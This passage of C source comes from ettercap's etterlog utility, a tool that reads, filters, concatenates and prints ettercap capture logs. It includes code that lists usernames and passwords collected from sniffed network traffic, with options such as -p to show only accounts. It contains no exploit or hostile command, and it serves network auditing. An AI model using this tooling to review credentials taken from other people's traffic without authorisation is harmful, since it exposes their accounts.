(!EL_GBL_OPTIONS->passwords) { /* load the fingerprint database */ fingerprint_init(); /* load the manuf database */ manuf_init(); /* load the services names */ services_init(); } /* write the XML prolog */ if (EL_GBL_OPTIONS->xml) { fprintf(stdout, "\n\n"); fprintf(stdout, "\n", EC_VERSION, ec_ctime(NULL)); } else fprintf(stdout, "\n\n"); /* parse the list */ TAILQ_FOREACH(h, hosts_list_head, next) { /* respect the TARGET selection */ if (!is_target_info(h)) continue; /* we are searching one particular user */ if (find_user(h, EL_GBL->user) == -E_NOTFOUND) continue; /* if the regex was set, respect it */ if (!match_regex(h)) continue; /* skip the host respecting the options */ if (EL_GBL_OPTIONS->only_local && (h->type & FP_HOST_NONLOCAL)) continue; if (EL_GBL_OPTIONS->only_remote && (h->type & FP_HOST_LOCAL)) continue; /* set the color */ if (EL_GBL_OPTIONS->color) { if (h->type & FP_GATEWAY) set_color(COL_RED); else if (h->type & FP_HOST_LOCAL) set_color(COL_GREEN); else if (h->type & FP_HOST_NONLOCAL) set_color(COL_BLUE); } /* print the infos */ if (EL_GBL_OPTIONS->passwords) print_pass(h); else if (EL_GBL_OPTIONS->xml) print_host_xml(h); else print_host(h); /* reset the color */ if (EL_GBL_OPTIONS->color) reset_color(); } /* close the global tag */ if (EL_GBL_OPTIONS->xml) fprintf(stdout, "\n"); fprintf(stdout, "\n\n"); } /* * return 1 if h matches the regex */ static int match_regex(struct host_profile *h) { struct open_port *o; char os[OS_LEN+1]; if (!EL_GBL_OPTIONS->regex || !EL_GBL->regex) return 1; /* check the manufacturer */ if (regexec(EL_GBL->regex, manuf_search((const char*)h->L2_addr), 0, NULL, 0) == 0) return 1; /* check the OS */ fingerprint_search((const char*)h->fingerprint, os); if (regexec(EL_GBL->regex, os, 0, NULL, 0) == 0) return 1; /* check the open ports banners and service */ LIST_FOREACH(o, &(h->open_ports_head), next) { if (regexec(EL_GBL->regex, service_search(o->L4_addr, o->L4_proto), 0, NULL, 0) == 0) return 1; if (o->banner && regexec(EL_GBL->regex, o->banner, 0, NULL, 0) == 0) return 1; } return 0; } /* * print the ip and the account collected */ static void print_pass(struct host_profile *h) { struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; /* walk the list */ LIST_FOREACH(o, &(h->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { /* skip client not matching the filter */ if (!ip_addr_is_zero(&EL_GBL->client) && ip_addr_cmp(&EL_GBL->client, &u->client)) continue; fprintf(stdout, " %-15s ", ip_addr_ntoa(&h->L3_addr, tmp)); if (strcmp(h->hostname, "")) fprintf(stdout, "(%s)", h->hostname); /* print the client if requested */ if (EL_GBL_OPTIONS->showclient) fprintf(stdout, "(%s)", ip_addr_ntoa(&u->client, tmp)); fprintf(stdout, " %s %-5d %s USER: %s \tPASS: %s ", (o->L4_proto == NL_TYPE_TCP) ? "TCP" : "UDP" , ntohs(o->L4_addr), (u->failed) ? "*" : "", u->user, u->pass); if (u->info) fprintf(stdout, " INFO: %s\n\n", u->info); else fprintf(stdout, "\n\n"); } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_log.c000664 000000 000000 00000026712 13711276346 020064 0ustar00rootroot000000 000000 /* etterlog -- read the logfile Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include void open_log(char *file); int get_header(struct log_global_header *hdr); int get_packet(struct log_header_packet *pck, u_char **buf); int get_info(struct log_header_info *inf, struct dissector_info *buf); static int put_header(gzFile fd, struct log_global_header *hdr); static int put_packet(gzFile fd, struct log_header_packet *pck, u_char *buf); static int put_info(gzFile fd, struct log_header_info *inf, struct dissector_info *buf); void concatenate(int argc, char **argv); static void dump_file(gzFile fd, struct log_global_header *hdr); /*******************************************/ /* * open the logfile, then drop the privs */ void open_log(char *file) { int zerr; EL_GBL_LOGFILE = strdup(file); EL_GBL_LOG_FD = gzopen(file, "rb"); if(EL_GBL_LOG_FD == Z_NULL) FATAL_ERROR("Cannot read the log file, please ensure you have enough permissions to read %s: error %s", file, gzerror(EL_GBL_LOG_FD, &zerr)); } /* * returns the global header */ int get_header(struct log_global_header *hdr) { int c; c = gzread(EL_GBL_LOG_FD, hdr, sizeof(struct log_global_header)); if (c != sizeof(struct log_global_header)) return -E_INVALID; /* convert to host order */ hdr->magic = ntohs(hdr->magic); if (hdr->magic != EC_LOG_MAGIC) return -E_INVALID; hdr->first_header = ntohs(hdr->first_header); gzseek(EL_GBL_LOG_FD, hdr->first_header, SEEK_SET); /* adjust the timestamp */ hdr->tv.tv_sec = ntohl(hdr->tv.tv_sec); hdr->tv.tv_usec = ntohl(hdr->tv.tv_usec); hdr->type = ntohl(hdr->type); return E_SUCCESS; } /* * store the header in a file */ static int put_header(gzFile fd, struct log_global_header *hdr) { int c; /* convert to network order */ hdr->magic = htons(hdr->magic); hdr->first_header = htons(hdr->first_header); hdr->tv.tv_sec = htonl(hdr->tv.tv_sec); hdr->tv.tv_usec = htonl(hdr->tv.tv_usec); hdr->type = htonl(hdr->type); c = gzwrite(fd, hdr, sizeof(struct log_global_header)); if (c != sizeof(struct log_global_header)) FATAL_ERROR("Cannot write output file"); /* convert to host order */ hdr->magic = ntohs(hdr->magic); hdr->first_header = ntohs(hdr->first_header); hdr->tv.tv_sec = ntohl(hdr->tv.tv_sec); hdr->tv.tv_usec = ntohl(hdr->tv.tv_usec); hdr->type = ntohl(hdr->type); return E_SUCCESS; } /* * read the header of a packet * and return the data in the buf */ int get_packet(struct log_header_packet *pck, u_char **buf) { int c; c = gzread(EL_GBL_LOG_FD, pck, sizeof(struct log_header_packet)); if (c != sizeof(struct log_header_packet)) return -E_INVALID; pck->len = ntohl(pck->len); /* adjust the timestamp */ pck->tv.tv_sec = ntohl(pck->tv.tv_sec); pck->tv.tv_usec = ntohl(pck->tv.tv_usec); /* allocate the memory for the buffer */ SAFE_CALLOC(*buf, pck->len, sizeof(u_char)); /* copy the data of the packet */ c = gzread(EL_GBL_LOG_FD, *buf, pck->len); if ((size_t)c != pck->len) return -E_INVALID; return E_SUCCESS; } /* * store a packet into a file */ static int put_packet(gzFile fd, struct log_header_packet *pck, u_char *buf) { int c; pck->len = htonl(pck->len); pck->tv.tv_sec = htonl(pck->tv.tv_sec); pck->tv.tv_usec = htonl(pck->tv.tv_usec); c = gzwrite(fd, pck, sizeof(struct log_header_packet)); if (c != sizeof(struct log_header_packet)) return -E_INVALID; pck->len = ntohl(pck->len); pck->tv.tv_sec = ntohl(pck->tv.tv_sec); pck->tv.tv_usec = ntohl(pck->tv.tv_usec); /* copy the data of the packet */ c = gzwrite(fd, buf, pck->len); if ((size_t)c != pck->len) return -E_INVALID; return E_SUCCESS; } /* * read the header for the info and * return the user, pass ecc in buf */ int get_info(struct log_header_info *inf, struct dissector_info *buf) { int c; /* get the whole header */ c = gzread(EL_GBL_LOG_FD, inf, sizeof(struct log_header_info)); /* truncated ? */ if (c != sizeof(struct log_header_info)) return -E_INVALID; /* adjust the variable lengths */ inf->var.user_len = ntohs(inf->var.user_len); inf->var.pass_len = ntohs(inf->var.pass_len); inf->var.info_len = ntohs(inf->var.info_len); inf->var.banner_len = ntohs(inf->var.banner_len); /* * get the dissectors info * * we can deal only with associated user and pass, * so there must be present all of them */ if (inf->var.user_len) { SAFE_CALLOC(buf->user, inf->var.user_len + 1, sizeof(char)); c = gzread(EL_GBL_LOG_FD, buf->user, inf->var.user_len); if (c != inf->var.user_len) return -E_INVALID; } if (inf->var.pass_len) { SAFE_CALLOC(buf->pass, inf->var.pass_len + 1, sizeof(char)); c = gzread(EL_GBL_LOG_FD, buf->pass, inf->var.pass_len); if (c != inf->var.pass_len) return -E_INVALID; } if (inf->var.info_len) { SAFE_CALLOC(buf->info, inf->var.info_len + 1, sizeof(char)); c = gzread(EL_GBL_LOG_FD, buf->info, inf->var.info_len); if (c != inf->var.info_len) return -E_INVALID; } if (inf->var.banner_len) { SAFE_CALLOC(buf->banner, inf->var.banner_len + 1, sizeof(char)); c = gzread(EL_GBL_LOG_FD, buf->banner, inf->var.banner_len); if (c != inf->var.banner_len) return -E_INVALID; } /* * sanity check for ip_addr struct */ switch (ntohs(inf->L3_addr.addr_type)) { case AF_INET: if (ntohs(inf->L3_addr.addr_len) != IP_ADDR_LEN) return -E_INVALID; break; case AF_INET6: if (ntohs(inf->L3_addr.addr_len) != IP6_ADDR_LEN) return -E_INVALID; break; default: return -E_INVALID; } /* if client IP address has been set otherwise skip */ if (!ip_addr_is_zero(&inf->client)) { switch (ntohs(inf->client.addr_type)) { case AF_INET: if (ntohs(inf->client.addr_len) != IP_ADDR_LEN) return -E_INVALID; break; case AF_INET6: if (ntohs(inf->client.addr_len) != IP6_ADDR_LEN) return -E_INVALID; break; default: return -E_INVALID; } } return E_SUCCESS; } /* * store a info struct into a file */ static int put_info(gzFile fd, struct log_header_info *inf, struct dissector_info *buf) { int c; /* adjust the variable lengths */ inf->var.user_len = htons(inf->var.user_len); inf->var.pass_len = htons(inf->var.pass_len); inf->var.info_len = htons(inf->var.info_len); inf->var.banner_len = htons(inf->var.banner_len); /* write the header */ c = gzwrite(fd, inf, sizeof(struct log_header_info)); if (c != sizeof(struct log_header_info)) return -E_INVALID; /* reconvert for internal use */ inf->var.user_len = ntohs(inf->var.user_len); inf->var.pass_len = ntohs(inf->var.pass_len); inf->var.info_len = ntohs(inf->var.info_len); inf->var.banner_len = ntohs(inf->var.banner_len); /* write the data */ if (inf->var.user_len) { c = gzwrite(fd, buf->user, inf->var.user_len); if (c != inf->var.user_len) return -E_INVALID; } if (inf->var.pass_len) { c = gzwrite(fd, buf->pass, inf->var.pass_len); if (c != inf->var.pass_len) return -E_INVALID; } if (inf->var.info_len) { c = gzwrite(fd, buf->info, inf->var.info_len); if (c != inf->var.info_len) return -E_INVALID; } if (inf->var.banner_len) { c = gzwrite(fd, buf->banner, inf->var.banner_len); if (c != inf->var.banner_len) return -E_INVALID; } return E_SUCCESS; } /* * concatenate two (or more) files into one single file */ void concatenate(int argc, char **argv) { int zerr; gzFile fd; struct log_global_header hdr, tmp; memset(&hdr, 0, sizeof(struct log_global_header)); /* open the output file for writing */ fd = gzopen(EL_GBL_LOGFILE, "wb"); ON_ERROR(fd, NULL, "%s", gzerror(fd, &zerr)); /* * use EL_GBL_LOG_FD here so the get_header function * will use this file */ EL_GBL_LOG_FD = gzopen(argv[argc], "rb"); ON_ERROR(EL_GBL_LOG_FD, NULL, "%s", gzerror(EL_GBL_LOG_FD, &zerr)); /* get the file header */ if (get_header(&hdr) != E_SUCCESS) FATAL_ERROR("Invalid log file (%s)", argv[argc]); /* write the header */ put_header(fd, &hdr); USER_MSG("Concatenating file [%s]", argv[argc]); /* copy the first file into the output */ dump_file(fd, &hdr); /* move the pointer to the next file */ argc++; /* cicle thru the file list */ while(argv[argc] != NULL) { EL_GBL_LOG_FD = gzopen(argv[argc], "rb"); ON_ERROR(EL_GBL_LOG_FD, NULL, "%s", gzerror(EL_GBL_LOG_FD, &zerr)); /* get the file header */ if (get_header(&tmp) != E_SUCCESS) FATAL_ERROR("Invalid log file (%s)", argv[argc]); /* check if the files are compatible */ if (hdr.type != tmp.type) FATAL_ERROR("Cannot concatenate different type of file"); USER_MSG("Concatenating file [%s]", argv[argc]); /* concatenate this file */ dump_file(fd, &tmp); gzclose(EL_GBL_LOG_FD); argc++; } gzclose(fd); USER_MSG("\nAll files concatenated into: %s\n\n", EL_GBL_LOGFILE); el_exit(0); } /* * dump the file into the fd */ static void dump_file(gzFile fd, struct log_global_header *hdr) { struct log_header_packet pck; struct log_header_info inf; struct dissector_info infbuf; u_char *pckbuf; int count = 0; memset(&pck,0,sizeof(struct log_header_packet)); memset(&inf,0,sizeof(struct log_header_info)); memset(&infbuf,0,sizeof(struct dissector_info)); /* loop until EOF */ LOOP { switch (hdr->type) { case LOG_INFO: if (get_info(&inf, &infbuf) != E_SUCCESS) { USER_MSG("\n"); return; } /* write the info */ put_info(fd, &inf, &infbuf); SAFE_FREE(infbuf.user); SAFE_FREE(infbuf.pass); SAFE_FREE(infbuf.info); SAFE_FREE(infbuf.banner); break; case LOG_PACKET: if (get_packet(&pck, &pckbuf) != E_SUCCESS) { USER_MSG("\n"); return; } /* write the data */ put_packet(fd, &pck, pckbuf); SAFE_FREE(pckbuf); break; default: FATAL_ERROR("Unknown log type"); break; } /* a dot every 10 packets */ if (count++ % 10 == 0) { USER_MSG("."); fflush(stdout); } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_main.c000664 000000 000000 00000010235 13711276346 020220 0ustar00rootroot000000 000000 /* etterlog -- log analyzer for ettercap log file Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define EL_GBL_FREE(x) do{ if (x != NULL) { free(x); x = NULL; } }while(0) /* global options */ struct ec_globals *ec_gbls; struct el_globals *el_gbls; /*******************************************/ int main(int argc, char *argv[]) { int ret; libettercap_init(PROGRAM, EC_VERSION); select_text_interface(); libettercap_ui_init(); el_globals_alloc(); /* etterlog copyright */ USER_MSG("\n" EC_COLOR_BOLD "%s %s" EC_COLOR_END " copyright %s %s\n\n", PROGRAM, EC_VERSION, EC_COPYRIGHT, EC_AUTHORS); /* allocate the global target */ SAFE_CALLOC(EL_GBL_TARGET, 1, sizeof(struct target_env)); /* initialize to all target */ EL_GBL_TARGET->all_mac = 1; EL_GBL_TARGET->all_ip = 1; #ifdef WITH_IPV6 EL_GBL_TARGET->all_ip6 = 1; #endif EL_GBL_TARGET->all_port = 1; /* getopt related parsing... */ parse_options(argc, argv); /* get the global header */ ret = get_header(&EL_GBL->hdr); if (ret == -E_INVALID) FATAL_ERROR("Invalid log file"); USER_MSG("Log file version : %s\n", EL_GBL->hdr.version); /* display the date. ec_ctime() has no newline at end. */ #if defined OS_DARWIN USER_MSG("Timestamp : %s [%d]\n", ec_ctime(&EL_GBL->hdr.tv), EL_GBL->hdr.tv.tv_usec); #else USER_MSG("Timestamp : %s [%lu]\n", ec_ctime(&EL_GBL->hdr.tv), EL_GBL->hdr.tv.tv_usec); #endif USER_MSG("Type : %s\n\n", (EL_GBL->hdr.type == LOG_PACKET) ? "LOG_PACKET" : "LOG_INFO" ); /* analyze the logfile */ if (EL_GBL_OPTIONS->analyze) analyze(); /* rewind the log file and skip the global header */ gzrewind(EL_GBL_LOG_FD); get_header(&EL_GBL->hdr); /* create the connection table (respecting the filters) */ if (EL_GBL_OPTIONS->connections) conn_table_create(); /* display the connection table */ if (EL_GBL_OPTIONS->connections && !EL_GBL_OPTIONS->decode) conn_table_display(); /* extract files from the connections */ if (EL_GBL_OPTIONS->decode) conn_decode(); /* not interested in the content... only analysis */ if (EL_GBL_OPTIONS->analyze || EL_GBL_OPTIONS->connections) el_exit(0); /* display the content of the logfile */ display(); el_exit(0); } /* ANSI color escapes */ void set_color(int color) { /* windows does not like ansi colors... */ #ifndef OS_WINDOWS char str[8]; sprintf(str, "\033[%dm", color); fflush(stdout); write(fileno(stdout), str, strlen(str)); #endif } /* reset the color to default */ void reset_color(void) { /* windows does not like ansi colors... */ #ifndef OS_WINDOWS fflush(stdout); write(fileno(stdout), EC_COLOR_END, 4); #endif } void el_globals_alloc(void) { SAFE_CALLOC(el_gbls, 1, sizeof(struct el_globals)); SAFE_CALLOC(el_gbls->options, 1, sizeof(struct el_options)); SAFE_CALLOC(el_gbls->regex, 1, sizeof(regex_t)); SAFE_CALLOC(el_gbls->t, 1, sizeof(struct target_env)); return; } void el_globals_free(void) { SAFE_FREE(el_gbls->user); SAFE_FREE(el_gbls->logfile); SAFE_FREE(el_gbls->options); SAFE_FREE(el_gbls->regex); SAFE_FREE(el_gbls->t); SAFE_FREE(el_gbls); return; } void el_exit(int code) { libettercap_ui_cleanup(); el_globals_free(); exit(code); } // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_parser.c000664 000000 000000 00000025653 13711276346 020602 0ustar00rootroot000000 000000 /* etterlog -- parsing utilities Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifdef HAVE_GETOPT_H #include #else #include #endif /* protos... */ static void el_usage(void); /*******************************************/ void el_usage(void) { fprintf(stdout, "\nUsage: %s [OPTIONS] logfile\n", PROGRAM); fprintf(stdout, "\nGeneral Options:\n"); fprintf(stdout, " -a, --analyze analyze a log file and return useful infos\n"); fprintf(stdout, " -c, --connections display the table of connections\n"); fprintf(stdout, " -f, --filter print packets only from this target\n"); fprintf(stdout, " -t, --proto display only this proto (default is all)\n"); fprintf(stdout, " -F, --filcon print packets only from this connection \n"); fprintf(stdout, " -s, --only-source print packets only from the source\n"); fprintf(stdout, " -d, --only-dest print packets only from the destination\n"); fprintf(stdout, " -r, --reverse reverse the target/connection matching\n"); fprintf(stdout, " -n, --no-headers skip header information between packets\n"); fprintf(stdout, " -m, --show-mac show mac addresses in the headers\n"); fprintf(stdout, " -k, --color colorize the output\n"); fprintf(stdout, " -l, --only-local show only local hosts parsing info files\n"); fprintf(stdout, " -L, --only-remote show only remote hosts parsing info files\n"); fprintf(stdout, "\nSearch Options:\n"); fprintf(stdout, " -e, --regex display only packets that match the regex\n"); fprintf(stdout, " -u, --user search for info about the user \n"); fprintf(stdout, " -p, --passwords print only accounts information\n"); fprintf(stdout, " -i, --show-client show client address in the password profiles\n"); fprintf(stdout, " -I, --client search for pass from a specific client\n"); fprintf(stdout, "\nEditing Options:\n"); fprintf(stdout, " -C, --concat concatenate more files into one single file\n"); fprintf(stdout, " -o, --outfile the file used as output for concatenation\n"); fprintf(stdout, " -D, --decode used to extract files from connections\n"); fprintf(stdout, "\nVisualization Method:\n"); fprintf(stdout, " -B, --binary print packets as they are\n"); fprintf(stdout, " -X, --hex print packets in hex mode\n"); fprintf(stdout, " -A, --ascii print packets in ascii mode (default)\n"); fprintf(stdout, " -T, --text print packets in text mode\n"); fprintf(stdout, " -E, --ebcdic print packets in ebcdic mode\n"); fprintf(stdout, " -H, --html print packets in html mode\n"); fprintf(stdout, " -U, --utf8 print packets in uft-8 using the \n"); fprintf(stdout, " -Z, --zero do not print packets, only headers\n"); fprintf(stdout, " -x, --xml print host infos in xml format\n"); fprintf(stdout, "\nStandard Options:\n"); fprintf(stdout, " -v, --version prints the version and exit\n"); fprintf(stdout, " -h, --help this help screen\n"); fprintf(stdout, "\n\n"); el_exit(0); } void parse_options(int argc, char **argv) { int c; static struct option long_options[] = { { "help", no_argument, NULL, 'h' }, { "version", no_argument, NULL, 'v' }, { "binary", no_argument, NULL, 'B' }, { "hex", no_argument, NULL, 'X' }, { "ascii", no_argument, NULL, 'A' }, { "text", no_argument, NULL, 'T' }, { "ebcdic", no_argument, NULL, 'E' }, { "html", no_argument, NULL, 'H' }, { "utf8", required_argument, NULL, 'U' }, { "zero", no_argument, NULL, 'Z' }, { "xml", no_argument, NULL, 'x' }, { "analyze", no_argument, NULL, 'a' }, { "connections", no_argument, NULL, 'c' }, { "filter", required_argument, NULL, 'f' }, { "filcon", required_argument, NULL, 'F' }, { "no-headers", no_argument, NULL, 'n' }, { "only-source", no_argument, NULL, 's' }, { "only-dest", no_argument, NULL, 'd' }, { "show-mac", no_argument, NULL, 'm' }, { "show-client", no_argument, NULL, 'i' }, { "color", no_argument, NULL, 'k' }, { "reverse", no_argument, NULL, 'r' }, { "proto", required_argument, NULL, 't' }, { "only-local", required_argument, NULL, 'l' }, { "only-remote", required_argument, NULL, 'L' }, { "outfile", required_argument, NULL, 'o' }, { "concat", no_argument, NULL, 'C' }, { "decode", no_argument, NULL, 'D' }, { "user", required_argument, NULL, 'u' }, { "regex", required_argument, NULL, 'e' }, { "passwords", no_argument, NULL, 'p' }, { "client", required_argument, NULL, 'I' }, { 0 , 0 , 0 , 0} }; optind = 0; while ((c = getopt_long (argc, argv, "AaBCcDdEe:F:f:HhiI:kLlmno:prsTt:U:u:vXxZ", long_options, (int *)0)) != EOF) { switch (c) { case 'a': EL_GBL_OPTIONS->analyze = 1; break; case 'c': EL_GBL_OPTIONS->connections = 1; break; case 'D': EL_GBL_OPTIONS->connections = 1; EL_GBL_OPTIONS->decode = 1; NOT_IMPLEMENTED(); break; case 'f': #ifdef WITH_IPV6 if (!strncmp(optarg, "///", 3) && strlen(optarg) == 3) EL_GBL_TARGET->scan_all = 1; #else if (!strncmp(optarg, "//", 2) && strlen(optarg) == 2) EL_GBL_TARGET->scan_all = 1; #endif compile_target(optarg, EL_GBL_TARGET); break; case 'F': filcon_compile(optarg); break; case 's': EL_GBL_OPTIONS->only_source = 1; break; case 'd': EL_GBL_OPTIONS->only_dest = 1; break; case 'k': EL_GBL_OPTIONS->color = 1; break; case 'r': EL_GBL_OPTIONS->reverse = 1; break; case 't': EL_GBL_TARGET->proto = strdup(optarg); break; case 'n': EL_GBL_OPTIONS->no_headers = 1; break; case 'm': EL_GBL_OPTIONS->showmac = 1; break; case 'i': EL_GBL_OPTIONS->showclient = 1; break; case 'I': if (ip_addr_pton(optarg, &EL_GBL->client) != E_SUCCESS) { FATAL_ERROR("Invalid client ip address"); return; } break; case 'l': EL_GBL_OPTIONS->only_local = 1; break; case 'L': EL_GBL_OPTIONS->only_remote = 1; break; case 'u': EL_GBL->user = strdup(optarg); break; case 'p': EL_GBL_OPTIONS->passwords = 1; break; case 'e': EL_GBL_OPTIONS->regex = 1; set_display_regex(optarg); break; case 'o': EL_GBL_LOGFILE = strdup(optarg); break; case 'C': EL_GBL_OPTIONS->concat = 1; break; case 'B': EL_GBL->format = &bin_format; break; case 'X': EL_GBL->format = &hex_format; break; case 'A': EL_GBL->format = &ascii_format; break; case 'T': EL_GBL->format = &text_format; break; case 'E': EL_GBL->format = &ebcdic_format; break; case 'H': EL_GBL->format = &html_format; break; case 'U': set_utf8_encoding((u_char*)optarg); EL_GBL->format = &utf8_format; break; case 'Z': EL_GBL->format = &zero_format; break; case 'x': EL_GBL_OPTIONS->xml = 1; break; case 'h': el_usage(); break; case 'v': printf("%s %s\n", PROGRAM, EC_VERSION); el_exit(0); break; case ':': // missing parameter fprintf(stdout, "\nTry `%s --help' for more options.\n\n", PROGRAM); el_exit(0); break; case '?': // unknown option fprintf(stdout, "\nTry `%s --help' for more options.\n\n", PROGRAM); el_exit(0); break; } } /* file concatenation */ if (EL_GBL_OPTIONS->concat) { if (argv[optind] == NULL) FATAL_ERROR("You MUST specify at least one logfile"); /* this function does not return */ concatenate(optind, argv); } /* normal file operation */ if (argv[optind]) open_log(argv[optind]); else FATAL_ERROR("You MUST specify a logfile\n"); /* default to ASCII view */ if (EL_GBL->format == NULL) EL_GBL->format = &ascii_format; return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterlog/el_profiles.c000664 000000 000000 00000020236 13711276346 021121 0ustar00rootroot000000 000000 /* etterlog -- host profiling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ TAILQ_HEAD(, host_profile) hosts_list_head = TAILQ_HEAD_INITIALIZER(hosts_list_head); /* protos */ void *get_host_list_ptr(void); int profile_add_info(struct log_header_info *inf, struct dissector_info *buf); static void update_info(struct host_profile *h, struct log_header_info *inf, struct dissector_info *buf); static void update_port_list(struct host_profile *h, struct log_header_info *inf, struct dissector_info *buf); static void update_user_list(struct open_port *o, struct log_header_info *inf, struct dissector_info *buf); static void set_gateway(u_char *L2_addr); /************************************************/ /* * return the pointer to the host list */ void *get_host_list_ptr(void) { return &hosts_list_head; } /* * creates or updates the host list * return the number of hosts added (1 if added, 0 if updated) */ int profile_add_info(struct log_header_info *inf, struct dissector_info *buf) { struct host_profile *h; struct host_profile *c; struct host_profile *last = NULL; /* * do not store profiles for hosts with ip == 0.0.0.0 * they are hosts requesting for a dhcp/bootp reply. * they will get an ip address soon and we are interested * only in the latter. */ if (ip_addr_is_zero(&inf->L3_addr)) return 0; /* * if the type is FP_HOST_NONLOCAL * search for the GW and mark it */ if (inf->type & FP_HOST_NONLOCAL) { set_gateway(inf->L2_addr); /* the mac address of non local should not be saved */ memset(inf->L2_addr, 0, MEDIA_ADDR_LEN); } /* search if it already exists */ TAILQ_FOREACH(h, &hosts_list_head, next) { /* an host is identified by the mac and the ip address */ /* if the mac address is null also update it since it could * be captured as a DHCP packet specifying the GW */ if ((!memcmp(h->L2_addr, inf->L2_addr, MEDIA_ADDR_LEN) || !memcmp(inf->L2_addr, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN) ) && !ip_addr_cmp(&h->L3_addr, &inf->L3_addr) ) { update_info(h, inf, buf); /* the host was already in the list * return 0 host added */ return 0; } } /* the host was not found, create a new entry */ SAFE_CALLOC(h, 1, sizeof(struct host_profile)); /* update the host info */ update_info(h, inf, buf); /* search the right point to inser it (ordered ascending) */ TAILQ_FOREACH(c, &hosts_list_head, next) { if ( ip_addr_cmp(&c->L3_addr, &h->L3_addr) > 0 ) break; last = c; } if (TAILQ_FIRST(&hosts_list_head) == NULL) TAILQ_INSERT_HEAD(&hosts_list_head, h, next); else if (c != NULL) TAILQ_INSERT_BEFORE(c, h, next); else TAILQ_INSERT_AFTER(&hosts_list_head, last, h, next); return 1; } /* set the info in a host profile */ static void update_info(struct host_profile *h, struct log_header_info *inf, struct dissector_info *buf) { /* update the type only if not previously saved */ if (h->type == 0) h->type = inf->type; /* update the mac address only if local or unknown * and only if it is not null */ if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) if (memcmp(inf->L2_addr, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) memcpy(h->L2_addr, inf->L2_addr, MEDIA_ADDR_LEN); /* the ip address */ memcpy(&h->L3_addr, &inf->L3_addr, sizeof(struct ip_addr)); /* the distance in HOP */ if (h->distance == 0) h->distance = inf->distance; /* copy the hostname */ strncpy(h->hostname, inf->hostname, MAX_HOSTNAME_LEN); /* * update the fingerprint only if there isn't a previous one * or if the previous fingerprint was an ACK * fingerprint. SYN fingers are more reliable */ if (inf->fingerprint[FINGER_TCPFLAG] != '\0' && (h->fingerprint[FINGER_TCPFLAG] == '\0' || h->fingerprint[FINGER_TCPFLAG] == 'A') ) memcpy(h->fingerprint, inf->fingerprint, FINGER_LEN); /* add the open port */ update_port_list(h, inf, buf); } /* * search the host with this L2_addr * and mark it as the GW */ static void set_gateway(u_char *L2_addr) { struct host_profile *h; /* skip null mac addresses */ if (!memcmp(L2_addr, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) return; TAILQ_FOREACH(h, &hosts_list_head, next) { if (!memcmp(h->L2_addr, L2_addr, MEDIA_ADDR_LEN) ) { h->type |= FP_GATEWAY; return; } } } /* * update the list of open ports * and add the user and pass infos */ static void update_port_list(struct host_profile *h, struct log_header_info *inf, struct dissector_info *buf) { struct open_port *o; struct open_port *p; struct open_port *last = NULL; /* search for an existing port */ LIST_FOREACH(o, &(h->open_ports_head), next) { if (o->L4_proto == inf->L4_proto && o->L4_addr == inf->L4_addr) { /* set the banner for the port */ if (o->banner == NULL && buf->banner) o->banner = strdup(buf->banner); /* update the user info */ update_user_list(o, inf, buf); return; } } /* skip this port, the packet was logged for * another reason, not the open port */ if (inf->L4_addr == 0) return; /* create a new entry */ SAFE_CALLOC(o, 1, sizeof(struct open_port)); o->L4_proto = inf->L4_proto; o->L4_addr = inf->L4_addr; /* add user and pass */ update_user_list(o, inf, buf); /* search the right point to inser it (ordered ascending) */ LIST_FOREACH(p, &(h->open_ports_head), next) { if ( ntohs(p->L4_addr) > ntohs(o->L4_addr) ) break; last = p; } /* insert in the right position */ if (LIST_FIRST(&(h->open_ports_head)) == NULL) LIST_INSERT_HEAD(&(h->open_ports_head), o, next); else if (p != NULL) LIST_INSERT_BEFORE(p, o, next); else LIST_INSERT_AFTER(last, o, next); } static void update_user_list(struct open_port *o, struct log_header_info *inf, struct dissector_info *buf) { struct active_user *u; struct active_user *a; struct active_user *last = NULL; /* no info to update */ if (buf->user == NULL || buf->pass == NULL) return; /* search for an existing user and pass */ LIST_FOREACH(u, &(o->users_list_head), next) { if (!strcmp(u->user, buf->user) && 